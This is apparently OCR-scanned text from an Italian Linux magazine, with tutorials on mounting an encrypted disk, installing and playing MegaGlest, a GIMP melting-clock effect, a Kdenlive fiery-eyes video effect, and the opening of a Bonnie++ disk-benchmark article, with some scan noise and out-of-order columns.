definito liberamente; la cosa impor- 
tante è che sia univoco e che con- 
senta di identificare il dispositivo in 
questione. 
EI. aver premuto Invio, ci ver- 
rà richiesta la passphrase per 
sbloccare l’accesso (quella usata 
per la cifratura e per accedere nor- 
malmente al disco) e, se questa è 
corretta, il programma risponde- 
rà informandoci che lo slot è sta- 
to sbloccato e che il comando è 
stato eseguito con successo. Non 
rimane che montare il disco fisso 
in modo da renderlo accessibile. 
Il comando da utilizzare è mount 
a cui però dobbiamo “passare” il 
device appena sbloccato: mount 
-o ro /dev/mapper/disco_cifrato 
/mnt. In questo caso, abbiamo an- 
che aggiunto l'opzione ro per fare 
in modo che il contenuto del disco 
fisso sia accessibile in sola lettura 
(read only). Per accedere ai dati 
cifrati dovremo semplicemente en- 
trare nella directory /mnt. 
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MegaGlest: quando 


‘la strategia e un'arte! 


E Scegliete la vostra fazione e guidatela alla vittoria attraverso 
un attento uso delle risorse, un buon uso delle tecnologie e le 
opportune strategie da combattimento! 


MegaGlest 3.9.1 


| Licenza: GNU GPL Tipo: Gioco Sito Web: http:/megaglest.org/ 


strategico in tempo reale (RTS - Real-Time Srategy) il cui 

sviluppo, però, si fermò subito dopo poiché venne dichia- 
rato raggiunto il target che si erano imposti gli sviluppatori originari. 
Ecco allora che i sorgenti, rilasciati con licenza GNU GPL, subiro- 
no un fork dividendosi in due progetti: MegaGlest e GAE (Glast 
Advanced Engine). | due titoli si differenziano nella diversa strada 
intrapresa: di base c'è sempre lo strategico Glest, ma mentre GAE 
si orienta sul miglioramento del motore grafico al fine di fornire una 
piattaforma di sviluppo per la creazionietdi giochi.3D RTS,.il. progetto 
MegaGlest pone tra i suoi obiettivi ur miglioramento nell'interazione 
tra giocatori via rete nonché del gameplay, nuove mappe e aggiunta 
di nuove fazioni. Un'interessante«comparazione tra l'originale e i due 
fork possiamo vederla a questo indirizzo http:/glest.wikia.com/wiki/ 
Engines. Fatta questa breve premessa, procediamo all'installazione 
di MegaGlest. 


Di tempo fa abbiamo presentato il gioco Glest, uno 


REQUISITI DI SISTEMA 
L'hardware necessario per giocare 


Un computer con CPU da almeno 1,56Hz, possibilmente dual 
core, e un quantitativo minimo di RAM pari a 1GB. La scheda 
grafica dovrà avere almeno 256MB di memoria dedicata e sup- 
portare le estensioni OpenGL 1.3, quindi successive all'anno 2001 
(ad esempio GeForce3 e Radeon 9000) e le OpenGL 1.4 {schede 
grafiche anno 2003) se si vogliono poter attivare tutti gli effetti. 
Raccomandata l'accelerazione hardware 3D utilizzando i driver 
specifici. Una connessione ADSL è d'obbligo qualora si voglia gio- 
care su un server esterno alla nostra LAN o se ne voglia creare 
uno rendendolo disponibile ad altri giocatori. Lo spazio necessa- 
rio su disco si aggira intorno a 1,2GB. 


Fig. 1A seconda della scelta il menu di MegaGlest 
cambierà scenario 


L'INSTALLAZIONE? FACILISSIMA! 


In ambito open source sono pochi i giochi che non abbiano un pac- 
chetto da installare conil gestore software della propria distribuzione: 
tra questi non rientra MegaGlest. Se consideriamo una Debian (o de- 
rivate, come Ubuntu) utilizziamo sudo apt-get install megaglest, 
per una Fedora procederemo' con yum install megaglest e in una 
OpenSUSE con sudo zyppet install megaglest. Qualora ci si ren- 
desse conto che la versione presente nel repositorio non sia l'ultima 
stabile rilasciata dal team degli sviluppatori del gioco o non fosse 
presente il pacchetto per la distribuzione in uso, possiamo usare il bi- 
nario, a 32 o a 64 bit a seconda dell'architettura del computer in uso, 
presente sul sito del gioco. Dopo aver scaricato il file MegaGlest- 
Installer-3.9.1_x86_64_linùx.run (circa 325MB) o l'equivalente per 
computer a 32 bit, forniamogli i permessi di esecuzione chmod +x 
MegaGlest-Installer-3.9.1_x86_64_linux.run quindi lanciamolo 
con ./MegaGlest-Installer-3.9.1_x86_64 linux.run. A questo 
punto seguiama il primo tutorial. 


COME SI GIOCA 


Lanciato il gioco, all'atto del caricamento verrà mostrato un breve vi- 
deo nel quale iniziano a palesarsi le peculiarità: le modalità di costru- 
zione delle strutture ricordano Age of Empires mentre i combattimen- 
ti tra i personaggi delle fazioni avverse tende a richiamare Warcraft. 
Chi conosce questi due titoli non avrà alcuna difficoltà a immergersi 


Installiamo MegaGlest 


Un wizard semplifica la procedura 


l'ora cre N rec 


SCELTA DIRECTORY 
0 Dopo aver lanciato il file .run 

clicchiamo su Avanti alla prima 
schermata quindi su Si per accettare la 
licenza e di nuovo su Avanti. Nella finestra 
Destinazione, in figura, riportiamo il 
percorso di installazione cliccando su 
Sfoglia se quello di default non è di nostro 
gradimento. 


nelle atmosfere nonché nelle Modalità di gioco di MegaGlest. 

Alle fazioni originariamente:presenti, Magic e Tech, ne sono sta- 
te aggiunte altre cinque: Indian, Egypt, Norsemen, Persian e 
Romans. Ognuna ha specifiche caratteristiche in termini di abi- 


I COMANDI 

Il primo passo ora è compren- 
dere i comandi di gioco. Dal 
menu generale, cliccando su Opzioni, an- 
diamo su Impostazioni tastiera e cerchia- 
| mo di memorizzare la funzione dei tasti, 
almeno di quelli fondamentali. Se non 
dovessero essere di nostro gradimento 
possiamo sempre variarne la mappatura. 


amtatiatare n sove 
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TRASFERIMENTO FILE 
0 2 Click su Avanti per avviare l'in- 

stallazione del gioco nel percor- 
so riportato. Al termine del trasferimento 
dei file cliccheremo su No nella pop-up Vi- 
sita megaglest.org quindi su Fine. A questo 
punto andiamo nel percorso di installazio- 
ne e lanciamo il gioco cliccando sul file {di 
fatto uno script) start megaglest. 


Impostazioni di base 


Proseguiamo con il setup prima di giocare 


LA GRAFICA 

Spostiamoci nel tab Video e 

regoliamo i parametri in base 
alla potenza del nostro PC. Se abbiamo un 
computer poco performante, clicchiamo 
sul pulsante Auto config per iniziare con 
una modalità più conservativa, rendendola 
più “aggressiva” in seguito, fino a quando 
non si presenterà qualche rallentamento. 


lità al combattimento, costruzioni o capacità di recuperare risor- 
se. L'obiettivo principale per la propria sopravvivenza è racimo- 
lare almeno le risorse necessarie al numero di costruzioni che si 
hanno in mente. Tutto ciò dovrà avvenire cercando di anticipare 


SCELTA LINGUA 
0 3 Apparirà it menu visibile in 

Figura 1. Se non è in lingua 
Italiana seguiamo questa procedura: click 
su Options e da qui andiamo nel tab Misc. 
Nel menu Language click sulle frecce fino 
ad arrivare su Italian. A questo punto in- 
seriamo il nome del nostro avatar nel rigo 
Playername quindi click in baso su Save. 


NUOVI OGGETTI 

Dal menu generale, cliccando 

su Mod Aggiuntive, possiamo 
scegliere se installare nuovi scenari, 
mappe etc. Ad esempio, volendo instal- 
lare un nuovo scenario, è sufficiente 
cliccare su un nome nella colonna Scena- 
ri, attendere la preview e, se è di nostro 
gradimento, cliccare su Installa. 


i tempi di azione poiché, mentre comandiamo gli operai, dovre- 
mo pensare a posizionare in maniera strategica i combattenti, 
in quanto l'attacco ad opera della (0 delle) fazioni avverse (intel- 
ligenza artificiale e/o altra fazione comandata da altra persona 
in rete) è solo una questione di qualche minuto! Per portare a 
termine questi compiti, sono previste specifiche azioni da segui- 
re, e allora prima di lanciarsi a testa bassa in epiche sfide in rete 
è opportuno dapprima seguire i tutorial integrati nel gioco così 
come riportato nel primo e nel secondo passo del terzo tutorial. 
Solo a questo punto possiamo pensare di sfidare le persone in 
rete: il terzo e quarto passo del terzo tutorial illustrano come pro- 
cedere. Una lista dei server di gioco attivi è disponibile a questo 
indirizzo http:/master.megaglest.org/ Come detto, è possibile, oltre 
che sfruttare uno dei server già presenti, crearne uno proprio per 
ospitare una partita nella propria LAN ed eventualmente metterlo 


a disposizione dei giocatori dalle diverse parti del mondo. In que- 
sti casi, in presenza di un firewall attivo (sia esso software come 
nel caso del kernel GNU/Linux o hardware implementato nei 
moderni router) occorre aprire alcune porte affinché il tutto pos- 
sa correttamente funzionare. La pagina di riferimento con tanto 
di esempio per un router Netgear è la seguente http:/glest.wikia. 
com/wiki/MG/Port_Forwarding. Una nota per concludere: quando 
accettiamo di giocare online, le mappe, gli scenari eil'audio che 
ci vengono proposti non è detto che siano già installati sul no- 
stro computer. In questo caso appena clicchiamo su Gioca ora! 
ci verrà chiesto, attraverso una finestra di pop-up, se vogliamo 
scaricare le parti mancanti: cliecando su Si, avverrà automatica- 
mente il download. Nel quarto passo del terzo tutorial c'è in atto 
il download delle texture, suoni e modelli necessari perla corretta 
visualizzazione e dell'audio della scelta effettuata. 


È ora di passare alla pratica! 


Occorre seguire l'iter del tutorial e di qualche scenario prima di fare sul serio! 


IMPARIAMO 
0 Come prima prova, è opportuno seguire i tutorial: si 
dividono in Very Basic, Basic e Advanced. Nel primo 
apparterremo alla fazione Indian, nel secondo alla Tech e nel 
terzo alla razza Magic. Pe seguirli è sufficiente cliccare su 
Nuovo Gioco nel menu generale quindi su Tutorial scegliendo 
quale seguire. 


IN RETE! 
0 3 Effettuata la scelta clicchiamo sul pulsante Gioca ora!. 
A questo punto, dopo aver fatto un po' di pratica è 
arrivato il momento di passare ad una sfida in rete. Se il nostro 
computer è in LAN. collegato con altri computer possiamo 
organizzare un LAN party altrimenti da Nuovo Gioco andiamo su 
Gioco su Internet, 


ì 
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INTELLIGENZA PC 
0 2 Se, dopo aver terminato i tutorial, dalmenu generale 
clicchiamo su Nuovo Gioco quindi su Scenario opte- 
remo per combattimenti contro l'intelligenza artificiale. Com- 
battimenti nei quali è possibile scegliere lo scenario tra quelli 
presenti e nei quali viene presentato anche un sunto (fazione di 
appartenenza, difficoltà ecc). 


LA SFIDA! 
04 Potrebbe esserci una partita in corso, come visibile 
nella figura del passo precedente, oppure degli slot 
liberi. Per entrare in partita potremmo cliccare su un pulsante 
nella colonna Unisciti e/o, sempre sulla destra, “chiamare” uno 
degli utenti in linea visibili nella cotonna a destra Persone Online 
su IRC ed invitarli al gioco. 
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Orologi Dali 2.0 


MI Realizzare immagini surrealistiche con delle fotografie? Facile! 
Grazie al fidato GIMP: impariamo autilizzare il fotoritocco per 
realizzare un effetto efficace e nel “modificare” la realtà 


gni fotografo, quando realizzare una immagine, si 

basa su idee e correnti artistiche che hanno avuto 

successo nei secoli passati. Per esempio, ci si può 

ispirare al romanticismo: tinte cupe, uso del chiaro- 
scuro, nebbia o altri fenomeni che conferiscono alla scena un 
certo alone di mistero. Le fonti di ispirazione sono diverse ma, in 
ogni caso, una foto è per definizione una rappresentazione della 
realtà. Eppure, anche la fotografia può puntare all’astratto: è il 
caso di immagini che riprendono forme geometriche o luci che di 
per se non rappresentano nulla di reale, ma generano una com- 
posizione gradevole. C'è, poi, una via di mezzo: il surrealismo. Il 
surrealismo parte dalla realtà, ma tende a deformarla: è difficile 
ottenere una fotografia surrealista, almeno in camera. Grazie a 
GIMP e al fotoritocco possiamo modificare la realtà, portandola 
ad essere ciò che vogliamo. Noi, per questo tutorial ci siamo ispi- 
rati ad una delle opere più famose del surrealismo: la persistenza 


Senza sfondo è meglio 


Cancelliamo lo sfondo per lavorare più facilmente 
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IL CANALE ALFA 

La prima cosa da fare, dopo avere aperto l'imma- 

gine originale in GIMP, è cancellare lo sfondo in 
modo da poter lavorare solo sul soggetto della fotografia. 
Per poter usare la trasparenza dobbiamo aggiungere un ca- 
nale alfa al livello Sfondo. 
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della memoria, di Salvador Dalì (anche nota come “Orologi molli”). 
Questo quadro rappresenta degli orologi “fusi”, come un ciocco- 
latino tenuto in mano per troppo tempo. Realizzare una fotografia 
del genere potrebbe essere complicato: sarebbe necessario met- 
tere l'orologio in un forno che raggiunge la temperatura di fusione 
della plastica o del metallo che costituisce i pezzi del segnatempo. 
Ma quando vediamo un oggetto liquefarsi, cos'è che vediamo, 
realmente? Vediamo l'oggetto stesso che, solitamente, nella 
sua parte più alta è intatto mentre nella parte inferiore appare 
deformato. Deformato in modo da apparire come un liquido, che 
sembra quindi formare delle gocce od una pozza. Ma, allora, tutto 
questo si può facilmente ottenere con un comodo filtro di GIMP: 
si chiama IWarp. L'origine del suo nome è avvolta nel mistero, 
non si sa esattamente per quale motivo sia stato chiamato così. 
Fatto sta che questo filtro consente di modificare l’immagine in 
modo interattivo, con diverse modalità: quella che a noi interessa 


SELEZIONE LAZO 

Utilizziamo lo strumento selezione Lazo per 

selezionare il soggetto della foto. Quando ab- 
biamo terminato è sufficiente premere Ctrl+l per inver- 
tire la selezione e poi Canc per rendere lo sfondo tra- 
sparente. 


è Sposta. Questa modalità di deformazione permette di prendere 
un punto dell'immagine e “tirarlo” o “spingerlo” a nostro piaci- 
mento. Per capire meglio come funziona, possiamo usare un pic- 
colo esempio: immaginiamo di realizzare un disegno con i colori 
a olio. Cosa succede se, dopo averlo tracciato, premiamo un dito 
sul foglio? L'immagine si deforma, dando l'impressione che si stia 
“squagliando”. Ecco, questo è proprio quello che otterremo con 
il filtro di GIMP. Per ottenere un effetto migliore prima di utilizzare 
l'IWarp schiacceremo l’immagine, in modo da rendere più facile 
la deformazione lungo l’asse orizzontale. Dopo avere applicato il 
filtro, invece, dovremo fondere insieme l’immagine dell’orologio 
“intatto” con quella del soggetto modificato, in modo che l'og- 
getto risultante abbia la parte superiore originale e quella inferiore 
liquefatta. Vedremo che con una maschera di livello e lo strumen- 
to Duplica è molto facile ottenere una immagine verosimile. 


W Fig. 1 è L'immagine da cui siamo partiti ed il risultato 


Let's do the time warp again 


Il filtro Iwarp ci consente di deformare l’immagine 


LUCE E CONTRASTO 

Correggiamo la luminosità ed il contrasto dell'im- 
magine, con lo strumento Luminosità/Contrasto 
presente nel menu Colori. Potremo aggiustare questi valori 
anche in seguito, ma conviene agire prima di applicare la de- 
formazione. 


FILTRO IWARPING 


Siamo ormai pronti per applicare al soggetto 

la distorsione Iwarp. Il filtro si trova nel menu 
Filtri/Distorsioni/IWarping: apparirà una finestra con di- 
verse opzioni, visto che il filtro è altamente configura- 
bile e consente di ottenere effetti diversi. 


coeso 
ceco 
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LIVELLO DUPLICATO 

Clicchiamo con il tasto destro sul livello del sogget- 

to e scegliamo dal menu che appare la voce Duplica 
livello. Lavorando sulla copia usiamo lo strumento Scala per 
mantenere la larghezza dell'oggetto costante, e rendere l’al- 
tezza poco più della metà dell'originale. 


LINEE PRINCIPALI 

0 Per il nostro scopo la modalità di deformazione è 
Sposta. Il filtro viene applicato disegnando delle 
linee nel riquadro di anteprima. Per quelle principali possia- 
mo usare un raggio pari a 20 e disegnare delle linee dall'alto 
verso il basso che partono dal centro e puntano ai lati. 


UNA FOTO REALISTICA 


Visto che vogliamo realizzare un'opera palesemente finta, è neces- 
sario che il soggetto appaia più verosimile possibile. Per la nostra 
fotografia siamo partiti da un soggetto molto semplice: un orologio. 
Come possiamo fotografarlo in modo da non far apparire l'imma- 


gine costruita ad arte? La soluzione più semplice consiste nell'uti- 
lizzare uno sfondo di carta bianca che non abbia un angoto netto tra 
pavimento e la parete. Poi si possono sfruttare due luci: una che ge- 
neri un bagliore sull'orologio, l'altra diffusa e posta lungo la stessa 
direzione della precedente ma con verso opposto per cancellare le 
ombre formate. Questa seconda lampada può essere un flash con 
un vetro smerigliato in modo da avere una luce molto morbida. 


N Fig. 2 è Il fuso orario. 0 l'orario fuso. 


Le due immagini devono essere unite in modo realistico 


LE LINEE PICCOLE 


Dopo avere tracciato le linee principali per la deforma- 

zione, possiamo ritoccare alcuni particolari riducendo 
il raggio [per esempio portandolo a 10). Questo è molto utile per 
lavorare sulla parte inferiore della foto senza interferire con quella 
superiore. 


su CIIT tg] d iL o SUA D e ve u osa 
So MdÉki Sosiro Presto prrnigme Lode Gabi Roveto tai Privo) direrd Foo dito 


SENZA IL FONDO 
03 In questo momento, probabilmente, la parte inferio- 
re dell'orologio originale si può intravedere dietro 
all'immagine modificata. Possiamo cancellarla selezionando- 
la con lo strumento Lazo, lavorando sul livello inferiore, e poi 
premendo Canc. 
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LO SPOSTAMENTO 


Prima di poter unire i due livelli, è necessario far- 

li collimare. Lo strumento Sposta fa al caso nostro: 
possiamo utilizzarlo per traslare il livello con la foto deformata 
in modo che il suo bordo possa coincidere con quello dell'imma- 
gine originale. 
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SENZA LA CIMA 
04 Anche l'orologio deformato ha una parte di troppo: 
quella superiore, che deve gradualmente scomparire 
per essere sostituita dalla foto originale. Quindi clicchiamo sul li- 
vello superiore col tasto destro e scegliamo Aggiungi maschera 
di livello. 
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Un cocktail ben riuscito 


Rendiamo più omogenea possibile la miscela delle due immagini 


SFUMATURE DI GRIGIO 

Dobbiamo ora far sparire la parte superiore 

dell'orologio deformato. Utilizzando lo strumento 
Sfumatura possiamo disegnare nella maschera di livello un 
gradiente che va dal bianco al nero. Ricordiamo che il nero 
rende l'immagine invisibile. 


ANDIAMO IN PAUSA 

Quando riteniamo di avere ottenuto un buon risul- 

tato, dobbiamo smettere di lavorare sulla masche- 
ra di livello. Basta cliccare con il tasto destro sul livello e 
togliere la spunta a Modifica maschera di livello. 


UNA PENNELLATA 

Tramite lo strumento Pennello possiamo ritoccare 

la maschera di livello per far combaciare perfetta- 
mente i bordi delle due immagini. Ovviamente, se utilizziamo il 
colore nero si vedrà l'immagine originale, mentre con il bianco 
renderemo visibile quella distorta. 


UN NUOVO LIVELLO 

0 Per “pulire” il quadrante dell'orologio, la maschera di 
livello non è sufficiente. Quindi dobbiamo aggiungere un 
nuovo livello, spostarci su quello dell'immagine originale, e pren- 
dere lo strumento Duplica. Con Ctrl ed un click selezioniamo il 
colore di sfondo. 


CANDIDO E PULITO 


Tornando ora sul nuovo livello appena creato, comincia- 

mo a cliccare con il mouse finché non abbiamo coperto 
tutto ciò che non si dovrebbe vedere (per esempio numeri duplica- 
ti). È importante eseguire solo dei click, e non trascinare il cursore 
del mouse. 
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TUTTI INSIEME 

Quando l'immagine è pronta possiamo applicare la ma- 

schera del livello con l'orologio distorto cliccando su di 
esso col tasto destro e scegliendo Applica maschera di livello. 
Poi, utilizzando la voce di menu Fondi in basso, possiamo unire i 
tre livelli in uno. 
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Ti bruciano gli occhi? 


EE Un attore con gli occhi infuocati può sembrare un effetto 
complicato da realizzare... grazie a Kdenlive, possiamo ottenere 
ottimi risultati senza bisogno di ricorrere a software complicati, 
costosi e non liberi (Come After Effects) 


n un film con effetti speciali si può fare di tutto, ma a volte il 

risultato migliore si ottiene con piccole modifiche, che manten- 

gono la scena abbastanza realistica da non apparire grottesca. 

Per esempio: come si può presentare una persona molto ar- 
rabbiata? Potremmo trasformare l'attore in modo da fargli avere un 
aspetto mostruoso, cosa che spesso accade nei cartoni animati. 
Ma, forse, qualcosa di più semplice può farci ottenere comunque 
un buon effetto: qual'è l'esempio più famoso di un personaggio 
arrabbiato? Certamente il Caronte della Divina Commedia. Viene 
descritto come un uomo con occhi di fuoco e voce bassa. Se vo- 
gliamo inserire in un nostro filmato un iracondo, quindi, possiamo 
riferirci a questo personaggio. Realizzare una voce bassa è piut- 
tosto facile, grazie ad Audacity. Esistono due modi per cambiare 
il tono della voce: il più classico consiste nel modificare la veloci- 
tà. Funziona piuttosto bene, ma ovviamente l'audio non potrà più 
coincidere con il video (perchè hanno velocità e quindi lunghezza 
diverse). L'effetto Cambia intonazione di Audacity, però può fare 
una piccola magia: mantenere la velocità intatta e cambiare sol- 
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tanto il tono. Questo è ciò che fa per noi, perché l'audio risultante 
sarà perfettamente sovrapponibile al filmato originale. E le fiamme 
negli occhi? Per questo ci viene in aiuto Kdenlive, con il fidato ef- 
fetto rotoscope. Naturalmente, avremo bisogno del filmato di una 
fiamma. Il trucco è piuttosto semplice: basta sovrapporre il filmato 
della fiamma a quello dell'attore. Poi si sovrappone di nuovo il fil- 
mato originale alla fiamma e da questo si ritagliano i bulbi oculari. 
Riassumendo, abbiamo tre livelli, dal più alto al più basso: il volto, 
le fiamme, gli occhi. Una parte importante, per la riuscita dell'effet- 
to è che la fiamma abbia una dimensione leggermente superiore a 
quella degli occhi. In questo modo il risultato è che il fuoco sembra 
davvero posizionato tra l'iride e la parte più esterna della pupilla. 
Se, poi, le fiamme sono leggermente trasparenti e lasciano intra- 
vedere la pupilla l'effetto è ancora più verosimile. Ovviamente, in 
questi casi il concetto di verosimiglianza è piuttosto singolare: va 
da sé che l'immagine non può essere "realistica", nessuna persona 
potrebbe davvero avere delle fiamme all'interno dei propri occhi 
e rimanere viva. Ciò che conta è l'impressione che chi guarda il 


Che voce strana, che hai... 


Cominciamo a lavorare sull'audio del nostro filmato 


VIDEO IN AUDACITY 

Per lavorare sull'audio del filmato, basta caricare 

il file del nostro video in Audacity. Quando apriamo 
un file video, il programma estrae automaticamente l'audio 
e lo inserisce in una traccia. 
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VOCE SELEZIONATA 

A noi interessa una sola parte dell'intero audio: la 
voce dell'attore. Dovrebbe essere abbastanza facile 
da identificare nello spettro: quando l'abbiamo trovata dobbiamo 
solo selezionarla con il mouse. In questo modo lavoriamo solo su 
questa parte. 


filmato ha nel primo momento: quando guardiamo un cartone ani- 
mato Pixar sappiamo che i personaggi non possono essere veri, 
eppure appaiono verosimili (anche se vediamo un mostriciattolo 
antopomorfo verde e ciclopico) perché nel loro complesso risul- 
tano credibili. Anche mentre realizziamo il nostro effetto, quindi, 
è fondamentale tenere a mente che vogliamo costruire qualcosa 
che possa convincere gli spettatori pur non essendo realistico, al- 
trimenti apparirà grottesco. Una delle cose che contribuisce a ren- 
dere plausibile l'effetto è il feathering del rotoscope: si può vedere 
facilmente che in sua assenza il contorno degli occhi è troppo netto 
e le fiamme sono staccate di netto dalla faccia. Il feather, invece, 
smorza i margini di ciascuna fiamma e la inserisce nel contesto in 
un modo molto più credibile. Potete trovare il filmato d'esempio al 
seguente indirizzo: www.youtube.com/watch?v=bbxqonG-Kbs 


I Fig.1-In questo caso la fiamma appare allungata 
all'interno dell'occhio 


Il “doppiaggio” con la voce modificata 


Cambiamo tono alla voce e sostituiamola a quella originale 
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CAMBIO DEL TONO 

Per modificare il tono della voce è sufficiente uti- 

lizzare il filtro Effetti/Cambia intonazione. Per ot- 
tenere un tono più basso si deve impostare una percentuale 
di cambiamento negativa. Possiamo ascoltare una anteprima 
del risultato. 


rr 
ULI 


ogg 


IL MONTAGGIO 
03 Siamo pronti per il montaggio video: carichiamo nella 
traccia Audio1 il file audio modificato, ed in Video3 
mettiamo il filmato originale. Togliamo il suono a Video3, perchè 
l'unica traccia audio deve essere quella realizzata con audacity. 


ESPORTAZIONE 
02 Esattamente come in Kdenlive, Salva serve a regi- 
strare il progetto. Se vogliamo avere un file multi- 
mediale utilizzabile, dobbiamo utilizzare ilmenù File/Esporta. 
Possiamo scegliere il formato Wav, 0gg, ed MP3: per Kdenlive 
andranno tutti bene. 


ECCO LE FIAMME 
04 Inseriamo nella traccia Video2 la clip con le fiamme 
acquistata su DetFilmsHD. Nella timeline, la clip 
deve coincidere con il momento in cui vogliamo che gli occhi si 
incendino, quindi dobbiamo tagliarla di conseguenza. 
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DET_FILMS_HD 


Per questo effetto sono necessari delle riprese di fiamme. Il no- 


stro filmato di esempio è basato sulle clip realizzate da DetFilmHD 
(Attp:/detfilmshd.com/Collections PKFireColumns.html) che hanno 
ilpregio diessere fornitecon lo sfondo trasparente, e possono quin- 
di essere utilizzati in Kdenlive senza bisogno di applicare una chia- 
ve cromatica. Naturalmente, un buon fuoco si può anche ottenere 
con un chroma key su sfondo blu. Basta filmare un fiamma [pro- 
dotta con un panno appallottolato ed imbevuto di cherosene, come 
le vecchie torce] davanti ad uno sfondo di colore blu. Vi suggeria- 
mo di utilizzare il blu perché il verde si confonderebbe con il giallo 
della fiamma ed il nero non consente mai un chroma key ottimale. E Fig. 1° In questo caso le fiamme riempiono interamente 
gli occhi 


Tutti in posizione 


Le clip devono essere spostate per coincidere con la posizione degli occhi 


UNA COMPOSIZIONE SOPRA L'OCCHIO 
L'immagine della fiamma deve essere sovrap- La fiamma va ridimensionata, con le apposi- 
posta a quella del filmato originale, quindi ap- te maniglie, e spostata in modo che si trovi in 


plichiamo l'ormai consueta transizione Composito alla coincidenza con l'occhio dell'attore. Possiamo dare alla 
clip di Video 2, per tutta la sua lunghezza. La transizione è fiamma una dimensione tale da coprire l'intero occhio, 
riferita alla traccia Video3, ovviamente. oppure solo la parte centrale. 


E ADESSO L'ALTRO PICCOLA PICCOLA 

Ripetiamo questi passaggi per l'altro occhio: Anche questa seconda fiamma va posizionata 

dobbiamo inserire la clip nella traccia Video1 ed nell'occhio. Le due clip dovrebbero avere più o 
applicare la transizione Composito. Anche in questo caso, meno le stesse dimensioni e la stessa posizione relativa, 
la transizione è riferita alla traccia Video3, altrimenti non altrimenti la cosa sembrerà strana. Ricordiamo che finora 
si potrà vedere correttamente. abbiamo lavorato solo sul primo frame della transizione. 
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Un incendio “controllato” | 


i Le fiamme non devono uscire dal contomo degli occhi 


» UNA NUOVA TRACCIA 
0 Cliccando con il tasto destro sull'intestazio- 
: ne della traccia Video1 appare un menù da cui 
possiamo scegliere Aggiungi traccia. Inseriamo quindi una 
nuova traccia video prima di Video1. 


QUELLO ORIGINALE 

Nella nuova traccia Video1, inseriamo il filmato ori- 

ginale e posizioniamolo in modo che coincida perfet- 
tamente con quello della traccia Video3. Applichiamo anche a 
questa traccia una transizione Composito riferita a Video3. 


IL ROTOSCOPING 
03 Aggiungiamo l'effetto Rotoscope alla clip della 
traccia Video1 e disegniamo il contorno degli 
occhi. Con un unico disegno dobbiamo poter tracciare en- 
trambe i contorni, quindi i due occhi saranno tra lo colle- 
gati da un tratto centrale più sottile possibile. 


ANCORA UNA TRANSIZIONE 

Adesso arriva la parte noiosa: dobbiamo spo- 

starci avanti, frame per frame, ed aggiustare 
la maschera disegnata in modo che segua il movimento 
degli occhi. Ad ogni nuovo frame, ovviamente, dobbiamo 
impostare un nuovo keyframe con l'apposito pulsante. 


E LA TRANSIZIONE? 
05 Dopo avere sistemato la maschera di Video1, 
i dobbiamo procedere frame per frame anche 
sulle transizioni di Video2 e Video3 per assicurarci che le 
fiamme abbiano più o meno sempre la stessa posizione 
nei rispettivi occhi. 


UN TAGLIO ED È FATTA 

Quando anche la posizione delle fiamme è 

corretta, dobbiamo soltanto tagliare la clip 
di Video1, in modo che sia presente solo dal frame in 
cui appare il fuoco fino a quello in cui le fiamme scom- 
paiono. 
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Bonnie++ 1.96 


Licenza: GNU GPL Tipo: Benchmarking 
Sito Web: www.coker.com.au/bonnie++/ 


urante l'installazione di una distribuzione GNU/Linux 
ognuno di noi si è scontrato (a meno di aver optato per 
la creazione automatica) con il dilemma del partizio- 
namento del disco in un primo momento e subito dopo con la 
relativa formattazione legata alla scelta del filesystem. Riguardo 
il partizionamento, abbiamo diverse volte affrontato l'argomen- 
to, osservando che il numero di partizioni in genere dipende 
destinato. Per la scelta del filesy- 
stem, gli aspetti possono essere molteplici ma, normalmente, 


dall'uso a cui il computer è 


al primo posto si mette sempre la velocità di trasferimento dei 
dati (throughput o data transfer rate) ben sapendo, però, che 
questo non è l'unico parametro a caratterizzare un hard disk, 
classico 0 SSD che sia. Nel seguito definiremo diversi parametri 
e illustreremo alcuni esempi di test. 


COSA MISURARE? 


La domanda è lecita, poiché i parametri che caratterizzano un 
hard disk sono numerosi e definirli e/o misurarli tutti (laddo- 
ve possibile) esulerebbe dall'obiettivo di questo articolo. Senza 
pretesa di completezza, proviamo a definire alcune grandezze 
che entrano in gioco nelle misure, al fine di comprenderne, sep- 
pur in maniera sommaria, la complessità che si cela nonché un 
certo tipo di aleatorietà non facilmente predicibile con i test. 
Con riferimento ad un hard disk tradizionale, siamo soliti consi- 
derarlo come un piatto strutturato in settori circolari e per ogni 
traccia individuarne il settore della traccia dove la testina va a 
posizionarsi per il tramite di un braccio attuatore. Un insieme di 
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SCOPRI QUANTO 
E VELOCE 
IL TUO DISCO! 


Misurare le prestazioni di un disco fisso è un'operazione 
affatto semplice! Presentiamo un paio di soluzioni che ci 
permettono di analizzare al meglio questo delicato aspetto. 


Michele Petrecca 


settori di traccia contigui definiscono un cluster. Il Data Tran- 
sfer Rate indica un trasferimento di dati nell'unità di tempo una 
volta che la testina si è posizionata ed è pronta per scerivere/ 
leggere i dati, valore proporzionale alla velocità di rotazione del 
disco e alla densità di dati di superficie. La velocità di trasferi- 
mento è strettamente dipendente da due valori: il Peak Transfer 
Rate e il Sequencial Transfer Rate, legati rispettivamente alla 
velocità interna del buffer e 
buffer non fossero allocati i dati richiesti. In presenza di dati 


ad una lettura da testina qualora nel 


frammentati (frammentazione interna e/o esterna), la velocità di 
trasferimento tende a ridursi drasticamente. Per poter iniziare il 
trasferimento dei dati, la testina deve potervi accedere; il tempo 
necessario è detto Access Time (Tempo di Accesso) somma di 
quattro termini: 


Access Time = Command Overhead Time + Seek Time 
+ Settling Time + Latency 


Il primo addendo è 
all'azione una volta che ha ricevuto un comando, in sostanza un 


il tempo che il controllore impiega a passare 


tempo di reazione. In assoluto è il valore più basso tra i quattro 
addendi e in genere viene trascurato. Il Seek Time (Tempo di 
Ricerca) indica il tempo richiesto alla testina per spostarsi da 
una traccia all'altra. Ovviamente il numero e l'ampiezza degli 
spostamenti dipende da cosa si sta richiedendo e ancora una vol- 
ta dalla quantità di frammentazione, ovvero se la testina dovrà 
saltare in settori di traccia adiacenti, tracce adiacenti o in posi- 
zioni opposte lungo il raggio. Effettuato il posizionamento la 
testina necessita di un Tempo di Assestamento (Settling Time) 
per poter iniziare in maniera corretta la fase di lettura/scrittura. 
L'ultimo addendo è il tempo di latenza (Latency), una volta che 
il braccio è stato portato sulla giusta traccia deve attendere il 
passaggio del settore e questa attesa presenta un tempo inverso 
alla velocità di rotazione. Il tempo di latenza in genere contem- 
pla anche un “tempo rotazionale” ovvero il tempo necessario af- 


finché tutta la dimensione del settore venga letta/scritta e la cui 
tempistica è inversa alla velocità di rotazione. Queste conside- 
razioni sono tutte lecite nel momento in cui dobbiamo testare di- 
verse marche di dispositivi compresi gli SSD per i quali alcune 
tempistiche rispetto al classico hard disk perdono di significato. 
Buona parte dei parametri riportati dovrebbero essere forniti dai 
